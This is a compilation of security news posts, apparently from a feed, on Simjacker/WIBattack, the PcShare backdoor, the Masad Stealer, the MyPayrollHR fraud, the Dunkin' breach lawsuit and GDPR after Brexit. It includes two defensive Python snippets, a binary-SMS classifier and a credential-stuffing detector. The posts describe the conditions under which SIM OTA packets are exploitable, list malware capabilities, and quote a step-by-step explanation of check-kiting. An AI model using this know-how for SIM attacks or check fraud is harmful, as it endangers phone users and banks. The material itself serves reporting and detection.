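def _swap_bcd(raw):
    """Decode a swapped-nibble BCD address; 0xF is the filler for odd digit counts."""
    digits = []
    for octet in raw:
        digits.append(octet & 0x0F)
        digits.append(octet >> 4)
    return "".join(str(d) for d in digits if d != 0xF)


def parse_sms_deliver(tpdu_hex):
    """Split an SMS-DELIVER TPDU (TS 23.040 9.2.2.1) into its header fields and user data."""
    b = bytes.fromhex(tpdu_hex)
    first = b[0]
    if first & 0x03 != 0x00:
        raise ValueError("not an SMS-DELIVER TPDU")
    i = 1
    oa_digits, toa = b[i], b[i + 1]
    i += 2
    oa_len = (oa_digits + 1) // 2
    number = _swap_bcd(b[i:i + oa_len])
    i += oa_len
    if (toa & 0x70) == 0x10:        # type-of-number 001 = international
        number = "+" + number
    pid, dcs = b[i], b[i + 1]
    i += 2
    scts = b[i:i + 7].hex()          # service-centre timestamp, left encoded
    i += 7
    udl = b[i]
    i += 1
    return {"udhi": bool(first & 0x40), "oa": number, "pid": pid, "dcs": dcs,
            "scts": scts, "udl": udl, "ud": b[i:]}


def _dcs_is_class2(dcs):
    """Class 2 = 'SIM/USIM specific' in both DCS groups that carry a message class."""
    if (dcs & 0xF0) == 0xF0:                      # data coding / message class group
        return (dcs & 0x03) == 0x02
    if (dcs & 0xC0) == 0x00 and (dcs & 0x10):     # general group with class bits present
        return (dcs & 0x03) == 0x02
    return False


def classify(msg):
    """'sim-data-download' when both indicators that route a TPDU to the SIM are set,
    'suspicious-binary' when only one is, otherwise 'text'."""
    pid_dl = msg["pid"] == 0x7F
    cls2 = _dcs_is_class2(msg["dcs"])
    if pid_dl and cls2:
        return "sim-data-download"
    if pid_dl or cls2:
        return "suspicious-binary"
    return "text"


def parse_command_packet(ud):
    """Decode the TS 23.048 command packet header carried in the TP-UD of an OTA SMS."""
    cpl = int.from_bytes(ud[0:2], "big")   # length of everything after CPL
    chl = ud[2]                             # header length, SPI through RC/CC/DS
    spi1 = ud[3]
    hdr_end = 3 + chl
    return {
        "cpl": cpl, "chl": chl,
        "integrity": ("none", "RC", "CC", "DS")[spi1 & 0x03],
        "ciphered": bool(spi1 & 0x04),
        "kic": ud[5], "kid": ud[6],
        "tar": ud[7:10].hex(),
        "counter": int.from_bytes(ud[10:15], "big"),
        "padding": ud[15],
        "rc_cc_ds": ud[16:hdr_end].hex(),
        "secured_data": ud[hdr_end:hdr_end + (cpl - chl - 1)].hex(),
    }


def is_unauthenticated(packet):
    """True when the sender asked for neither a cryptographic check nor ciphering: the
    condition under which a SIM that still accepts the packet is exploitable by anyone
    able to send it an SMS."""
    return packet["integrity"] == "none" and not packet["ciphered"]


if __name__ == "__main__":
    for name, pdu in (("text", TEXT_TPDU), ("ota", OTA_TPDU)):
        msg = parse_sms_deliver(pdu)
        print(name, msg["oa"], hex(msg["pid"]), hex(msg["dcs"]), classify(msg))
        if classify(msg) != "text":
            print("  command packet:", parse_command_packet(msg["ud"]))
```

Seeing PID 0x7F / DCS 0xF6 from an unexpected originating address is the signal SnoopSnitch-style tools alert on, since the application processor never displays such a message; on a real network the baseband would have to be tapped to get the TPDU, which is why the Android detector mentioned below needs root and a specific chipset.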

The researcher published a video PoC of the attack:

Lakatos shared his findings on WIBAttack with the GSM Association (GSMA).

In summary, at least two hacking techniques leverage vulnerabilities in components found on most of the SIM cards on the market, potentially exposing billions of mobile users to attacks.

The researcher announced that he is working on a mobile phone app that would allow users to scan their SIM cards to determine whether they are vulnerable to the Simjacker attack.

The researchers at SRLabs also developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset.

“The SnoopSnitch Android app warns users about binary SMS attacks including Simjacker since 2014. (Attack alerting requires a rooted Android phone with Qualcomm chipset.)” reported SRLabs.

Pierluigi Paganini

(SecurityAffairs – WIBattack, hacking)

The post After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk appeared first on Security Affairs.

Cylance Security Researchers Warn Technology Firms in Southeast Asia of Chinese Open-Source Backdoor

Attacks on technology businesses in Southeast Asia by a suspected Chinese threat actor employ a modified version of the open-source PcShare backdoor, security researchers at BlackBerry Cylance warn.

The attackers also used a trojanized screen reader application that replaces the built-in Windows Ease of Access Narrator, gaining remote control over infected systems without needing to steal credentials.

The Chinese open-source backdoor PcShare has been altered specifically for this campaign with additional C&C encryption and proxy-bypass functionality. In addition, the operators have stripped unused features from the code.

The malware is deployed by DLL side-loading on the victim’s machine. Specifically, the backdoor is loaded by the legitimate NVIDIA Smart Maximize Helper Host executable, which the researchers identified as a component of the NVIDIA GPU graphics driver.

After the initial compromise, a number of tools are used, many of them based on software publicly available on Chinese programming portals. One of these is a Trojan that abuses Microsoft accessibility features to obtain SYSTEM access by trojanizing the Narrator executable.

The attackers used memory injection so the primary backdoor binary never touches the disk, and encoded the payload in a way that depends on its execution path to hinder detection. The loader is configured in plain text, but the URL it carries is not the true C&C address; it instead points to a remote file containing the C&C communication details.

While the threat actors have used the same PcShare payload across multiple attacks, they often modified the side-loaded DLL for each target to update configuration details such as the C&C IP addresses and victim identifiers.

The malware establishes persistence by adding a registry entry and creates mutexes so that only one instance of the payload injection routine runs at a time.

Backdoor features include distinct operating modes (such as SSH and Telnet, automatic upgrade, and upload and download modes), traffic compression using a customized LZW algorithm, encrypted C&C communication using the PolarSSL library, and proxy authentication via local user credentials.

The malware’s remote management capabilities include listing, creating, renaming and deleting files and directories; listing and killing processes; editing registry keys and values; listing and manipulating services; enumerating and controlling windows; running binaries; downloading additional files from the C&C or a URL; uploading files to the C&C; spawning a command-line shell; displaying message boxes; and opening URLs.

The fake Narrator app used by the threat actor does not replace the legitimate application; it is a copy that mimics the Narrator user interface. The trojanized application is deployed after the attackers obtain administrative rights on the system, and it provides them with SYSTEM-level access.

The fake Narrator app was first seen four years ago, but the threat actor continues to modify it to fit each victim’s environment, the researchers say. The tool appears to have been used in only a very small number of attacks.

BlackBerry Cylance believes the actor is of Chinese origin based on the use of Chinese open-source projects and the geographic location of the victims.

“As of today, precise attribution of these attacks has proven elusive. The use of PcShare backdoor, as well as the geographical location of the victims, bear similarities to a known threat actor called Tropic Trooper, which is actively targeting government institutions and heavy industry companies in Taiwan and Philippines,” BlackBerry Cylance says.

The post Cylance Security Researchers Warn Technology Firms in Southeast Asia for Chinese Open –Source Backdoor appeared first on .

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Moritz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot of total finishers with 29. Singapore strengthened its already unbelievable position of per-capita top Flare-On finishing country with one Flare-On finisher per every 224,000 persons living in Singapore. Rounding out the top five are the consistent high-finishing countries of Vietnam, Russia, and China.

 

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

More SIM Cards Vulnerable to Simjacker Attack Than Previously Disclosed

Remember the Simjacker vulnerability? Earlier this month, we reported about a critical unpatched weakness in a wide range of SIM cards, which an unnamed surveillance company has actively been exploiting in the wild to remotely compromise targeted mobile phones just by sending a specially crafted SMS to their phone numbers. If you can recall, the Simjacker vulnerability resides in a dynamic

Superhero Movies and Security Lessons

A paper I co-wrote was just published in Security Journal: "Superheroes on screen: real life lessons for security debates":

Abstract: Superhero films and episodic shows have existed since the early days of those media, but since 9/11, they have become one of the most popular and most lucrative forms of popular culture. These fantastic tales are not simple amusements but nuanced explorations of fundamental security questions. Their treatment of social issues of power, security and control are here interrogated using the Film Studies approach of close reading to showcase this relevance to the real-life considerations of the legitimacy of security approaches. By scrutinizing three specific pieces -- Daredevil Season 2, Captain America: Civil War, and Batman v Superman: Dawn of Justice -- superhero tales are framed (by the authors) as narratives which significantly influence the general public's understanding of security, often encouraging them to view expansive power critically, to luxuriate within omnipotence while also recognizing the possibility as well as the need for limits, be they ethical or legal.

This was my first collaboration with Fareed Ben-Youssef, a film studies scholar. (And with Andrew Adams and Kiyoshi Murata.) It was fun to think about and write.

Cyber-Harassment Expert Wins MacArthur Genius Grant

Lawyer, law professor, and civil rights advocate Danielle Keats Citron has been awarded a MacArthur grant for her efforts to address the scourge of cyber-harassment. 

Citron, a professor at Boston University Law School, is one of 26 individuals this year to receive a so-called genius grant from the John D. and Catherine T. MacArthur Foundation. Citron was awarded $625,000 to support her ongoing mission to study and write about online abuse and invasions of sexual privacy, the harm that they inflict, and how law and society should respond to them.

Through her work, Citron has found that cyber-harassment can have a devastating and long-lasting effect on victims, making it difficult for them to go about their daily lives. 

"Cyber-harassment is the targeting of specific individuals with a course of conduct that causes severe emotional distress and often the fear of physical harm, and it impacts them in a way that takes away what we consider crucial ability to make the most out of their lives in the 21st century; to get employment, keep a job, engage with other people, and go to school free from the fear of online abuse," said Citron.

She continued: "We wouldn’t accept people walking down the street and being screeched at and threatened and humiliated and hurt, and we shouldn’t find it an acceptable part of online life."

Citron has been studying and writing about online abuse for 15 years. During that period, she has worked with tech companies to update safety and privacy policies. She has also advised US legislators and state attorneys general on how to combat the most extreme forms of cyber-abuse, including cyber-stalking and revenge porn—the posting of intimate photos or videos without consent. 

The situation is improving, with the number of states to pass cyber-stalking laws rising from 4 in 2009 to 46 today.

Currently, Citron is focused on studying and writing about deep fake technology, which is machine learning technology that lets you manipulate or fabricate audio and video to show people doing and saying things that they’ve never done or said. 

She said: "The technology is advancing so rapidly that soon—within months—technologists expect that the state of the art will become so sophisticated that it will become impossible to distinguish fakery from what’s real. The impact that it has is not just on individuals; it has an impact on the truth and more broadly on our trust in democratic institutions."

MyPayrollHR CEO Arrested, Admits to $70M Fraud

Earlier this month, employees at more than 1,000 companies saw one or two paychecks’ worth of funds deducted from their bank accounts after the CEO of their cloud payroll provider absconded with $35 million in payroll and tax deposits from customers. On Monday, the CEO was arrested and allegedly confessed that the diversion was the last desperate gasp of a financial shell game that earned him $70 million over several years.

Michael T. Mann, the 49-year-old CEO of Clifton Park, NY-based MyPayrollHR, was arrested this week and charged with bank fraud. In court filings, FBI investigators said Mann admitted under questioning that in early September — on the eve of a big payroll day — he diverted to his own bank account some $35 million in funds sent by his clients to cover their employee payroll deposits and tax withholdings.

After that stunt, two different banks that work with Mann’s various companies froze those corporate accounts to keep the funds from being moved or withdrawn. That action set off a chain of events that led another financial institution that helps MyPayrollHR process payments to briefly pull almost $26 million out of checking accounts belonging to employees at more than 1,000 companies that use MyPayrollHR.

At the same time, MyPayrollHR sent a message (see screenshot above) to clients saying it was shutting down and that customers should find alternative methods for paying employees and for processing payroll going forward.

In the criminal complaint against Mann (PDF), a New York FBI agent said the CEO admitted that starting in 2010 or 2011 he began borrowing large sums of money from banks and financing companies under false pretenses.

“While stating that MyPayroll was legitimate, he admitted to creating other companies that had no purpose other than to be used in the fraud; fraudulently representing to banks and financing companies that his fake businesses had certain receivables that they did not have; and obtaining loans and lines of credit by borrowing against these non-existent receivables.”

“Mann estimated that he fraudulently obtained about $70 million that he has not paid back. He claimed that he committed the fraud in response to business and financial pressures, and that he used almost all of the fraudulently obtained funds to sustain certain businesses, and purchase and start new ones. He also admitted to kiting checks between Bank of America and Pioneer [Savings Bank], as part of the fraudulent scheme.”

Check-kiting is the illegal act of writing a check from a bank account without sufficient funds and depositing it into another bank account, explains MagnifyMoney.com. “Then, you withdraw the money from that second account before the original check has been cleared.”

Kiting also is known as taking advantage of the “float,” which is the amount of time between when an individual submits a check as payment and when the individual’s bank is instructed to move the funds from the account.

Magnify Money explains more:

“Say, for example, that you write yourself a check for $500 from checking account A, and deposit that check into checking account B — but the balance in checking account A is only $75. Then, you promptly withdraw the $500 from checking account B. This is check-kiting, a form of check fraud that uses non-existent funds in a checking account or other type of bank account. Some check-kiting schemes use multiple accounts at a single bank, and more complicated schemes involve multiple financial institutions.”

“In a more complex scenario, a person could open checking accounts at bank A and bank B, at first depositing $500 into bank A and nothing in bank B. Then, they could write a check for $10,000 with account A and deposit it into account B. Bank B immediately credits the account, and in the time it might take for bank B to clear the check (generally about three business days), the scammer writes a $10,000 check with bank B, which gets deposited into bank A to cover the first check. This could keep going, with someone writing checks between banks where there’s no actual funds, yet the bank believes the money is real and continues to credit the accounts.”

The government alleges Mann was kiting millions of dollars in checks between his accounts at Bank of America and Pioneer from Aug. 1, 2019 to Aug. 30, 2019.

For more than a decade, MyPayrollHR worked with California-based Cachet Financial Services to process payroll deposits for MyPayrollHR client employees. Every other week, MyPayrollHR’s customers would deposit their payroll funds into a holding account run by Cachet, which would then disburse the payments into MyPayrollHR client employee bank accounts.

But when Mann diverted $26 million in client payroll deposits from Cachet to his account at Pioneer Bank, Cachet’s emptied holding account was debited for the payroll payments. Cachet quickly reversed those deposits, causing one or two pay periods worth of salary to be deducted from bank accounts for employees of companies that used MyPayrollHR.

That action caused so much uproar from affected companies and their employees that Cachet ultimately decided to cancel all of those reversals and absorb that $26 million hit, which it is now trying to recover through the courts.

According to prosecutors in New York, Pioneer was Mann’s largest creditor.

“Mann stated that the payroll issue was precipitated by his decision to route MyPayroll’s clients’ payroll payments to an account at Pioneer instead of directly to Cachet,” wrote FBI Special Agent Matthew J. Wabby. “He did this in order to temporarily reduce the amount of money he owed to Pioneer. When Pioneer froze Mann’s accounts, it also (inadvertently) stopped movement of MyPayroll’s clients’ payroll payments to Cachet.”

Approximately $9 million of the $35 million diverted by Mann was supposed to go to accounts at the National Payment Corporation (NatPay) — the Florida-based firm which handles tax withholdings for MyPayrollHR clients. NatPay said its insurance should help cover the losses it incurred when MyPayrollHR’s banks froze the company’s accounts.

Court records indicate Mann hasn’t yet entered a plea, but that he was ordered to be released today under a $200,000 bond secured by a family home and two vehicles. His passport also was seized.

New Spyware Threatens Telegram’s 200 Million Users

A new piece of spyware, designed to steal sensitive information from users of the messaging app Telegram, is for sale on the black market.  

Trojan-delivered Masad Stealer and Clipper was clocked by researchers at Juniper Threat Labs. The spyware uses Telegram as a command and control (CnC) channel to cloak itself in a veil of anonymity. 

After installing itself on the computer of a Telegram user, Masad Stealer busies itself collecting information stored on the system, such as browser passwords, autofill browser field data, and desktop files. The spyware also automatically replaces cryptocurrency wallet addresses found in the clipboard with the attacker's own.

Other information vulnerable to an attack perpetrated through Masad Stealer includes credit card browser data, FileZilla files, Steam files, browser cookies, PC and system information, and installed software and processes.

Masad Stealer is being advertised for sale in several hack forums, making it an active and ongoing threat. Buyers can pick up a variety of versions, ranging from a free one to a premium package costing $85, with each tier of the malware offering different features.

Researchers at Juniper said: "Masad Stealer sends all of the information it collects—and receives commands from—a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers."

Masad Stealer is written using AutoIt scripts and then compiled into a Windows executable. Most of the samples discovered by Juniper were 1.5 MiB in size; however, the spyware has also been strutting around in larger executables and has been spotted bundled into other software.

Telegram, which celebrated its sixth birthday in August, has over 200 million monthly active users. While its platform may have been breached, the app is fully confident in its ability to protect the privacy of messages sent by its users. 

The app claims on its website to be "more secure than mass market messengers like WhatsApp and Line" and offers anyone who can decipher a Telegram message up to $300,000 in prize money. 

It’s Google’s World. Your Business Is Just Living in It

Fifty attorneys general announced earlier this month that Google is the target of an antitrust probe. Any business owner who has happened to find themselves stuck in the company’s orbit–that would be any company with a digital presence–won’t hesitate to tell you such a move is long overdue.

Case in point: I just did a Google search for Basecamp, an online project management tool. The first two hits were for different companies–Smartsheet and Monday.com. Not too long ago, the same search resulted in a first hit featuring Basecamp, but it was an ad. The copy: “We don’t want to run this ad.”

“We’re the #1 result,” Basecamp’s ad copy continued, “but this site lets companies advertise against us using our brand. So here we are. A small, independent co. forced to pay ransom to a giant tech company.”

Basecamp founder and CEO Jason Fried doubled down on this sentiment on his Twitter feed, stating “[Y]ou’re forced to pay up if you want to be found. It’s a shakedown. It’s ransom.”

An Offer Businesses Can’t Refuse

Fried is by no means alone. Any business with an online presence has at one time or another played by Google’s rules to stay competitive. For most, it’s a daily reality. The reason is simple. Most businesses need websites, and websites need to follow Google’s best practices to be found in online searches, terms Google can force because it currently has 92 percent worldwide market share on search.

Google can make drastic changes to these best practices that have effectively buried companies overnight. A business that finds itself out of Google’s good graces, or in the case of Basecamp, finds itself nestled one or two slots beneath competitor ads in search results, would need to create a paid campaign via Google Ads (38.2 percent of the online advertising market) and pay to show up in search results.

A business with a physical location that wants to show up in local search results needs to create an account for Google My Business, so it can show up in Google Maps (which accounts for 67 percent of navigation app usage), but also needs to keep an eye on Google Reviews left on its business listing. The performance of ads, search traffic, and app usage can all be tracked via Google Analytics (over 70 percent of the analytics market), which provides business owners (and Google, of course) detailed information about who’s visiting their websites or using their apps. Most of these users will be using Google’s Chrome web browser (64 percent of users worldwide), on a device running Android (76 percent of mobile users worldwide), which was, of course, developed by Google.

Per Bob Dylan, “It doesn’t take a weatherman to tell which way the wind blows.” It would seem that Google has a monopoly, but that’s for the court to decide. On the face of it, it’s not necessarily bad news; anyone who remembers the days of phone books, mail order catalogs, and paper maps is most likely glad for the convenience of the services Google provides–businesses and consumers alike.

What’s problematic is the necessity of it all. It’s all but impossible for a business to opt out of Google’s services. Even taco trucks have websites. It’s equally difficult for us as consumers to opt out entirely, although alternatives (e.g., iOS, Apple Maps, and Bing) do exist. The fact is that businesses and industries that don’t in some way rely on at least one of Google’s services to be discovered are few and far between.

Our Data Is Valuable

However much value our data has, the fact remains that Google charges us to share it with Google. Nice work if you can get it, right?

When companies use Google’s services to make themselves known to the world, they have to share data on themselves, and also on their customers and clients. Every search query leading to a site, every ad click, every map search, and every visit tracked by analytics is actively helping Google build its library of information on as many people as possible–even people who have never actually used the internet.

As Google continues to expand its services, its ecosystem is oozing into businesses that have no choice but to pony up and participate or be lost in cyberspace. The evolution thus far points to the possibility of increasingly Orwellian methods in the realm of advertising and data collection.

What do I mean by Orwellian? Google Home and Nest products are aggressively moving into the field of facial recognition, and, of course, the company is thus far characteristically coy about the intended uses for the data thus collected.

“We can never say never,” said Google’s general manager of Home and Nest products when asked if data from face scanning would be used to target consumers for advertising. He added that it is not being used for that purpose now.

It’s far too soon to tell how the antitrust probe of Google will turn out, and it’s guaranteed to take a long time to play out. One thing is certain: The stakes are just as high, if not higher, for businesses as they are for consumers, and we all would be better served were we not being served by Google’s tentacular array of services.

The post It’s Google’s World. Your Business Is Just Living in It appeared first on Adam Levin.

Dunkin’ Sued for Keeping Data Breach Secret

New York is suing Dunkin' for allegedly failing to inform its customers of multiple cyber-attacks that compromised customer accounts.

According to the lawsuit, filed in state Supreme Court in Manhattan, money was stolen by cyber-criminals, who hacked into the online accounts of 20,000 Dunkin' customers in 2015. New York further alleges that Dunkin' didn't disclose to its customers full details of a cyber-attack that affected 300,000 customer accounts in 2018.

The lawsuit states: "In 2015, Dunkin’s customer accounts were targeted in a series of online attacks. During this period, attackers made millions of automated attempts to access customer accounts. Tens of thousands of customer accounts were compromised. Tens of thousands of dollars on customers’ stored value cards were stolen."

During the summer of 2015, Dunkin's app developer repeatedly alerted Dunkin' to ongoing attempts by hackers to log in to customer accounts and provided the company with a list of 19,715 accounts that had been compromised over just a sample five-day period, but the donut-seller failed to tell customers, according to the lawsuit.   

Dunkin’ chief communications officer Karen Raskopf told Infosecurity Magazine that there was no credence to the claims being made in the lawsuit.

In an emailed statement to Infosecurity Magazine, Raskopf said: "There is absolutely no basis for these claims by the New York Attorney General’s Office. For more than two years, we have fully cooperated with the AG’s investigation into this matter, and we are shocked and disappointed that they chose to move ahead with this lawsuit given the lack of merit to their case. 

"The investigation centered on a credential stuffing incident that occurred in 2015, in which third parties unsuccessfully tried to access approximately 20,000 Dunkin’ app accounts. The database in question did not contain any customer payment card information. 

"The incident was brought to our attention by our then-firewall vendor, and we immediately conducted a thorough investigation. This investigation showed that no customer’s account was wrongfully accessed, and, therefore, there was no reason to notify our customers."  

Dunkin' Brands, Inc. has 8,000 Dunkin' restaurants across America, a thousand of which are in New York.  

"We take the security of our customers’ data seriously and have robust data protection safeguards in place. We look forward to proving our case in court," said Raskopf.
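The lawsuit describes millions of automated login attempts and a vendor-supplied list of compromised accounts. As an added example (not part of the article and not Dunkin's or its vendor's code), here is a minimal credential-stuffing detector over constructed authentication log lines: it flags source addresses that try many distinct accounts with a high failure rate, and lists which of those accounts the source nonetheless logged into, the account-takeover signal a notification decision would hinge on. The log format, IP addresses and usernames are all constructed for this example.

```python
"""Credential-stuffing detector over constructed authentication logs.

Heuristic: a single source IP attempting logins against many *distinct*
accounts with a high failure rate looks like a credential list being replayed,
not a user mistyping a password. Any successful login from such a source is
then a candidate account takeover. (Added example; log format constructed.)
"""
from collections import defaultdict
import re

# Constructed log format: "<timestamp> ip=<addr> user=<name> result=<OK|FAIL>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

# Constructed sample: one stuffing source (203.0.113.7) spraying eight accounts,
# a legitimate user who mistypes once (198.51.100.23), a clean login, and one
# malformed line the parser must skip.
SAMPLE_LOG = """\
2015-07-01T10:00:01Z ip=203.0.113.7 user=alice result=FAIL
2015-07-01T10:00:02Z ip=203.0.113.7 user=bob result=FAIL
2015-07-01T10:00:02Z ip=203.0.113.7 user=carol result=OK
2015-07-01T10:00:03Z ip=203.0.113.7 user=dave result=FAIL
2015-07-01T10:00:03Z ip=198.51.100.23 user=ivan result=FAIL
2015-07-01T10:00:04Z ip=203.0.113.7 user=erin result=FAIL
2015-07-01T10:00:04Z ip=203.0.113.7 user=frank result=OK
2015-07-01T10:00:05Z ip=203.0.113.7 user=grace result=FAIL
2015-07-01T10:00:05Z ip=203.0.113.7 user=heidi result=FAIL
2015-07-01T10:00:09Z ip=198.51.100.23 user=ivan result=OK
2015-07-01T10:00:12Z ip=198.51.100.24 user=judy result=OK
this line is malformed and must be skipped
"""


def parse_line(line):
    """Return a dict of fields for a well-formed line, or None for garbage."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_stuffing(lines, min_accounts=5, min_fail_rate=0.5):
    """Aggregate per source IP and flag likely credential-stuffing sources.

    Returns {ip: {"accounts", "attempts", "failures", "fail_rate", "compromised"}}
    where "compromised" lists accounts the flagged source logged into.
    A production detector would also bound this by a time window; the sample
    here is short enough that the whole log is one window.
    """
    per_ip = defaultdict(
        lambda: {"attempts": 0, "failures": 0, "users": set(), "ok_users": set()}
    )
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # skip malformed lines rather than crash the pipeline
        s = per_ip[ev["ip"]]
        s["attempts"] += 1
        s["users"].add(ev["user"])
        if ev["result"] == "FAIL":
            s["failures"] += 1
        else:
            s["ok_users"].add(ev["user"])

    flagged = {}
    for ip, s in per_ip.items():
        fail_rate = s["failures"] / s["attempts"]
        # Many distinct accounts AND mostly failures: a user with a forgotten
        # password hits one account; a replayed credential list hits many.
        if len(s["users"]) >= min_accounts and fail_rate >= min_fail_rate:
            flagged[ip] = {
                "accounts": len(s["users"]),
                "attempts": s["attempts"],
                "failures": s["failures"],
                "fail_rate": round(fail_rate, 2),
                "compromised": sorted(s["ok_users"]),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in detect_stuffing(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['accounts']} accounts, fail rate {info['fail_rate']}, "
              f"took over {info['compromised']}")
```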

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is yet settled. In this murky context, companies in the UK and companies working with companies in the UK are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck debating whether to accept the deal on the table or face a no-deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal.

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension to be able to hopefully gain consensus until then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party who initiated Brexit and continues to support it hard says delaying is not an option. But considering that the Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR no longer applies in the UK, some very similar legislation will need to be enacted.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and have no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s highly possible that after the UK leaves the EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Another likely possibility is that GDPR will be absorbed into the UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category of controllers in the UK who are involved with processors outside the EU. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, fits into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors but they are even serving EU-based clients or having EU offices and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

